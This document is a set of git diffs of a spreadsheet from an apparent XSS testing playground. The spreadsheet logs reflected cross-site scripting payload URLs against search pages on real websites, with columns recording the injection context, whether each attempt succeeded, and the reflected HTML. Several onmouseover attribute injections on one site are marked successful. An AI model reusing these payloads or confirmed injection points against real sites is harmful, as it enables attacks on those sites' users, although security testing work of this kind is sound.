+      <c r="B20" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C20" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D20" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="21">
+      <c r="A21" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B21" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C21" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D21" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="22">
+      <c r="A22" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B22" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C22" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D22" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="23">
+      <c r="A23" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B23" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C23" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D23" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="24">
+      <c r="A24" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B24" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C24" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="25">
+      <c r="A25" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B25" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C25" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D25" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="26">
+      <c r="A26" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B26" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C26" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D26" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="27">
+      <c r="A27" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B27" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C27" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D27" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="28">
+      <c r="A28" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B28" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C28" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D28" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="29">
+      <c r="A29" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B29" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C29" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D29" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="30">
+      <c r="A30" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B30" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C30" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D30" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="31">
+      <c r="A31" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B31" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C31" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="32">
+      <c r="A32" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B32" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C32" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D32" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="33">
+      <c r="A33" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B33" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C33" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D33" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="34">
+      <c r="A34" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B34" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="35">
+      <c r="A35" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B35" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C35" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="36">
+      <c r="A36" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B36" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="37">
+      <c r="A37" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B37" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C37" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="38">
+      <c r="A38" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B38" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C38" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="39">
+      <c r="A39" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B39" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C39" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D39" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="40">
+      <c r="A40" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B40" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C40" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="41">
+      <c r="A41" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B41" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C41" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="42">
+      <c r="A42" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B42" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C42" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D42" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="43">
+      <c r="A43" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B43" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C43" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="44">
+      <c r="A44" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B44" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C44" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D44" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="45">
+      <c r="A45" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B45" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C45" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D45" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="46">
+      <c r="A46" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B46" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C46" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D46" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="47">
+      <c r="A47" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B47" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C47" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D47" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="48">
+      <c r="A48" t="inlineStr">
+        <is>
+          <t>https://www.scientificamerican.com/search/?q=&lt;img src=x onerror="alert(1)"&gt;</t>
+        </is>
+      </c>
+      <c r="B48" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C48" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D48" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="49">
+      <c r="A49" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B49" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C49" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D49" t="inlineStr">
+        <is>
+          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="50">
+      <c r="A50" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B50" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C50" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D50" t="inlineStr">
+        <is>
+          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="51">
+      <c r="A51" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B51" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C51" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D51" t="inlineStr">
+        <is>
+          <t>&lt;a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="52">
+      <c r="A52" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B52" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C52" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D52" t="inlineStr">
+        <is>
+          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="53">
+      <c r="A53" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B53" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C53" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D53" t="inlineStr">
+        <is>
+          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="54">
+      <c r="A54" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B54" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C54" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D54" t="inlineStr">
+        <is>
+          <t>&lt;a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="55">
+      <c r="A55" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B55" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C55" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D55" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="56">
+      <c r="A56" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B56" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C56" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D56" t="inlineStr">
+        <is>
+          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="57">
+      <c r="A57" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B57" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C57" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D57" t="inlineStr">
+        <is>
+          <t>&lt;input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="58">
+      <c r="A58" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)</t>
+        </is>
+      </c>
+      <c r="B58" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C58" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D58" t="inlineStr">
+        <is>
+          <t>&lt;a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=" onmouseover="alert(1)"&gt;</t>
+        </is>
+      </c>
+    </row>
+    <row r="59">
+      <c r="A59" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=&lt;a href="ja&amp;#9;vasc&amp;#10;ript&amp;#58;alert&amp;#40;1&amp;#41;"&gt;XYZ_XSS&lt;/a&gt;</t>
+        </is>
+      </c>
+      <c r="B59" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C59" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D59" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="60">
+      <c r="A60" t="inlineStr">
+        <is>
+          <t>https://www.redrivercatalog.com/search.html?addsearch=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B60" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C60" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D60" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
       </c>
     </row>
   </sheetData>

--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -5,7 +5,7 @@
   <workbookPr defaultThemeVersion="164011"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\XSS PlayGround\sample_data\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\My_Project\sample_data\"/>
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
@@ -351,7 +351,7 @@
   <dimension ref="A1:D1"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="C9" sqref="C9"/>
+      <selection activeCell="A2" sqref="A2:D49"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>

--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -1,54 +1,33 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
-  <fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/>
-  <workbookPr defaultThemeVersion="164011"/>
-  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\My_Project\sample_data\"/>
-    </mc:Choice>
-  </mc:AlternateContent>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <workbookPr/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020"/>
+    <workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/>
   </bookViews>
   <sheets>
-    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
+    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Sheet1" sheetId="1" state="visible" r:id="rId1"/>
   </sheets>
-  <calcPr calcId="0"/>
+  <definedNames/>
+  <calcPr calcId="0" fullCalcOnLoad="1"/>
 </workbook>
 </file>
 
-<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
-  <si>
-    <t>Attack URL</t>
-  </si>
-  <si>
-    <t>Context</t>
-  </si>
-  <si>
-    <t>Successful</t>
-  </si>
-  <si>
-    <t>Detection</t>
-  </si>
-</sst>
-</file>
-
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" mc:Ignorable="x14ac x16r2">
-  <fonts count="1" x14ac:knownFonts="1">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <numFmts count="0"/>
+  <fonts count="1">
     <font>
-      <sz val="11"/>
-      <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
+      <color theme="1"/>
+      <sz val="11"/>
       <scheme val="minor"/>
     </font>
   </fonts>
   <fills count="2">
     <fill>
-      <patternFill patternType="none"/>
+      <patternFill/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
@@ -67,21 +46,12 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
   <cellXfs count="1">
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="0"/>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
-  <extLst>
-    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}">
-      <x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/>
-    </ext>
-    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{9260A510-F301-46a8-8635-F512D64BE5F5}">
-      <x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/>
-    </ext>
-  </extLst>
 </styleSheet>
 </file>
 
@@ -347,33 +317,45 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <sheetPr>
+    <outlinePr summaryBelow="1" summaryRight="1"/>
+    <pageSetUpPr/>
+  </sheetPr>
   <dimension ref="A1:D1"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A2" sqref="A2:D49"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
+  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <cols>
-    <col min="1" max="1" width="109.7109375" customWidth="1"/>
-    <col min="2" max="2" width="13.5703125" customWidth="1"/>
-    <col min="3" max="3" width="13.7109375" customWidth="1"/>
-    <col min="4" max="4" width="96.42578125" customWidth="1"/>
+    <col width="109.7109375" customWidth="1" min="1" max="1"/>
+    <col width="13.5703125" customWidth="1" min="2" max="2"/>
+    <col width="13.7109375" customWidth="1" min="3" max="3"/>
+    <col width="96.42578125" customWidth="1" min="4" max="4"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A1" t="s">
-        <v>0</v>
+    <row r="1">
+      <c r="A1" t="inlineStr">
+        <is>
+          <t>Attack URL</t>
+        </is>
       </c>
-      <c r="B1" t="s">
-        <v>1</v>
+      <c r="B1" t="inlineStr">
+        <is>
+          <t>Context</t>
+        </is>
       </c>
-      <c r="C1" t="s">
-        <v>2</v>
+      <c r="C1" t="inlineStr">
+        <is>
+          <t>Successful</t>
+        </is>
       </c>
-      <c r="D1" t="s">
-        <v>3</v>
+      <c r="D1" t="inlineStr">
+        <is>
+          <t>Detection</t>
+        </is>
       </c>
     </row>
   </sheetData>

--- a/sample_data/file.xlsx
+++ b/sample_data/file.xlsx
@@ -1,33 +1,54 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <workbookPr/>
+<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" mc:Ignorable="x15">
+  <fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/>
+  <workbookPr defaultThemeVersion="164011"/>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice Requires="x15">
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\My_Project\sample_data\"/>
+    </mc:Choice>
+  </mc:AlternateContent>
   <bookViews>
